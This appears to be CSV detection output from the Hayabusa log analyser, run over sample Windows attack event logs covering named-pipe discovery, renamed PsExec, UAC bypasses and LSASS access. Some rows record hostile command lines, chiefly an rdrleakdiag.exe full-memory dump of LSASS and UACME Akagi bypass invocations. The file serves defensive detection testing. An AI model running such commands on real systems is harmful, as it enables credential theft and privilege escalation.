2020-09-27 22:19:54.314 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.322 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\LSM_API_service | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.328 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ntsvcs | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.343 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.350 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\ROUTER | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.364 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\scerpc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.371 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\srvsvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.377 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\tapsrv | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.385 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\trkwks | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:19:54.399 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:20:11.245 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:20:11.247 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Discovery/Discovery_Remote_System_NamedPipes_Sysmon_18.evtx
2020-09-27 22:42:00.726 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:00.969 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost | Process: System | PID: 4 | PGUID: 747F3D96-0C7A-5F71-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:01.092 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:01.093 +09:00,MSEDGEWIN10,17,info,,Pipe Created,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\svchost.exe | PID: 1120 | PGUID: 747F3D96-96A8-5F70-0000-0010C0F02D00,../hayabusa-rules/hayabusa/sysmon/events/17_PipeCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdin | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stdout | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:01.182 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\svchost-MSEDGEWIN10-8116-stderr | Process: C:\Windows\system32\PsExec.exe | PID: 8116 | PGUID: 747F3D96-96A8-5F70-0000-001028E92D00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:15.033 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\lsass | Process: C:\Windows\system32\svchost.exe | PID: 1000 | PGUID: 747F3D96-96B6-5F70-0000-0010E5382E00,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:15.525 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\wkssvc | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-27 22:42:15.530 +09:00,MSEDGEWIN10,18,info,,Pipe Connected,\browser | Process: C:\Windows\system32\mmc.exe | PID: 6096 | PGUID: 747F3D96-8E29-5F70-0000-001049471000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Defense Evasion/DE_renamed_psexec_service_sysmon_17_18.evtx
2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,"Cmd: rdrleakdiag.exe /p 668 /o C:\Users\wanwan\Desktop /fullmemdmp /snap | Process: C:\Windows\System32\rdrleakdiag.exe | User: DESKTOP-PIU87N6\wanwan | Parent Cmd: ""C:\WINDOWS\system32\cmd.exe"" | LID: 0x30b90 | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,Evas,RdrLeakDiag Process Dump,,../hayabusa-rules/sigma/process_creation/proc_creation_win_proc_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.197 +09:00,DESKTOP-PIU87N6,1,high,CredAccess,Process Dump via RdrLeakDiag.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_process_dump_rdrleakdiag.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.206 +09:00,DESKTOP-PIU87N6,8,medium,,Process Injection,Src Process: C:\Windows\System32\rdrleakdiag.exe | Tgt Process: C:\Windows\System32\lsass.exe | Src PID: 3352 | Src PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01 | Tgt PID: 668 | Tgt PGUID: BC47D85C-FAA9-5F68-0000-0010D9590000,../hayabusa-rules/hayabusa/sysmon/alerts/8_ProcessInjection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,info,,Process Created,Cmd: C:\WINDOWS\system32\lsass.exe | Process: C:\Windows\System32\lsass.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\WINDOWS\system32\lsass.exe | LID: 0x3e7 | PID: 7468 | PGUID: BC47D85C-DB68-5F71-0000-00109138AB01,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.215 +09:00,DESKTOP-PIU87N6,1,critical,CredAccess,Suspicious LSASS Process Clone,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_lsass_clone.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-09-28 21:47:36.630 +09:00,DESKTOP-PIU87N6,11,info,,File Created,Path: C:\Users\wanwan\Desktop\minidump_668.dmp | Process: C:\WINDOWS\system32\rdrleakdiag.exe | PID: 3352 | PGUID: BC47D85C-DB68-5F71-0000-0010B237AB01,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/sysmon_rdrleakdiag_lsass_dump.evtx
2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: POC.exe | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" | LID: 0x5a873 | PID: 4696 | PGUID: 747F3D96-2156-5F76-0000-0010DBE82500",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.415 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: Program | Process: C:\Users\Public\POC\bin\Debug\POC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: POC.exe | LID: 0x5a873 | PID: 5448 | PGUID: 747F3D96-2156-5F76-0000-00100EEC2500,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,,Suspicious Program Names,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_progname.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.606 +09:00,MSEDGEWIN10,1,high,Evas,Execution from Suspicious Folder,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_execution_path.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-02 03:35:02.775 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\abc.txt | Process: C:\Windows\System32\RuntimeBroker.exe | PID: 6932 | PGUID: 747F3D96-1903-5F76-0000-0010B85E0900,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/eop_appcontainer_il_broker_filewrite.evtx
2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.351 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Users\bouss\Downloads\UACME-3.2.6\Source\Akagi\output\x64\Debug\Akagi_64.exe | Tgt Process: C:\Windows\System32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1410 | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 19072 | Tgt PGUID: 00247C92-82A5-5F7B-0000-0010C89F0A2B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.390 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.394 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\explorer.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1014c0 | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 27356 | Tgt PGUID: 00247C92-858E-5F7B-0000-00106B29202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: C:\windows\system32\taskmgr.exe | Process: C:\Windows\System32\Taskmgr.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: Akagi_64.exe 59 cmd.exe | LID: 0x391e334 | PID: 18404 | PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\system32\svchost.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff | Src PID: 11640 | Src PGUID: 00247C92-5B27-5F74-0000-001045F11200 | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.450 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\windows\explorer.exe | Tgt Process: C:\windows\system32\taskmgr.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x12367b | Src PID: 27356 | Src PGUID: 00247C92-858E-5F7B-0000-00106B29202B | Tgt PID: 18404 | Tgt PGUID: 00247C92-858E-5F7B-0000-00105241202B,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx
2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 
| PGUID: 00247C92-858E-5F7B-0000-0010E741202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: C:\windows\system32\taskmgr.exe | LID: 0x391e334 | PID: 6636 | PGUID: 00247C92-858E-5F7B-0000-0010E741202B,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx 2020-10-06 05:43:58.451 +09:00,LAPTOP-JU4M3I0E,1,low,Evas,Taskmgr as Parent,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_taskmgr_parent.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/UACME_59_Sysmon.evtx 2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,info,,Process Created,"Cmd: ""C:\windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: LAPTOP-JU4M3I0E\bouss | Parent Cmd: ""C:\Windows\System32\mmc.exe"" WF.msc | LID: 0x391e334 | PID: 12876 | PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx 2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,1,high,LatMov,MMC Spawning Windows Shell,,../hayabusa-rules/sigma/process_creation/proc_creation_win_mmc_spawn_shell.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx 2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,low,,Process Access,Src Process: C:\Windows\System32\mmc.exe | Tgt Process: C:\windows\system32\cmd.exe | Src User: %SourceUser% | Tgt User: %TargetUser% | Access: 0x1fffff 
| Src PID: 20228 | Src PGUID: 00247C92-9E03-5F7B-0000-0010A645272C | Tgt PID: 12876 | Tgt PGUID: 00247C92-9E04-5F7B-0000-0010CF98272C,../hayabusa-rules/hayabusa/sysmon/events/10_ProcessAccess.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx 2020-10-06 07:28:20.530 +09:00,LAPTOP-JU4M3I0E,10,medium,PrivEsc | Evas,Suspicious In-Memory Module Execution,,../hayabusa-rules/sigma/process_access/sysmon_in_memory_assembly_execution.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/Sysmon_UACME_63.evtx 2020-10-07 06:40:30.910 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,../hayabusa-rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx 2020-10-07 06:40:42.943 +09:00,02694w-win10.threebeesco.com,7,medium,CredAccess,Unsigned Image Loaded Into LSASS Process,,../hayabusa-rules/sigma/image_load/sysmon_unsigned_image_loaded_into_lsass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_ImageLoad_NFSH_Sysmon_7.evtx 2020-10-07 07:11:17.572 +09:00,02694w-win10.threebeesco.com,18,info,,Pipe Connected,\winreg | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/18_PipeConnected.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx 2020-10-07 07:11:17.814 +09:00,02694w-win10.threebeesco.com,13,high,Exec | Persis,DLL Load via LSASS,,../hayabusa-rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx 2020-10-07 07:11:17.848 +09:00,02694w-win10.threebeesco.com,12,high,Exec | Persis,DLL Load via 
LSASS,,../hayabusa-rules/sigma/registry_event/sysmon_susp_lsass_dll_load.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx 2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64037 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx 2020-10-07 07:11:18.680 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.143:49920 (02694w-win10.threebeesco.com) | Dst: 172.16.66.36:49670 (01566S-WIN16-IR) | User: NT AUTHORITY\SYSTEM | Process: C:\Windows\System32\lsass.exe | PID: 632 | PGUID: 6A3C3EF2-E698-5F7C-0000-00103C790000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx 2020-10-07 07:11:18.930 +09:00,02694w-win10.threebeesco.com,3,info,,Network Connection,tcp | Src: 172.16.66.36:64038 (01566S-WIN16-IR) | Dst: 172.16.66.143:445 (02694w-win10.threebeesco.com) | User: NT AUTHORITY\SYSTEM | Process: System | PID: 4 | PGUID: 6A3C3EF2-E683-5F7C-0000-0010EB030000,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_regsvc_DirectoryServiceExtPt_Lsass_NTDS_AdamXpn.evtx 2020-10-14 05:11:42.278 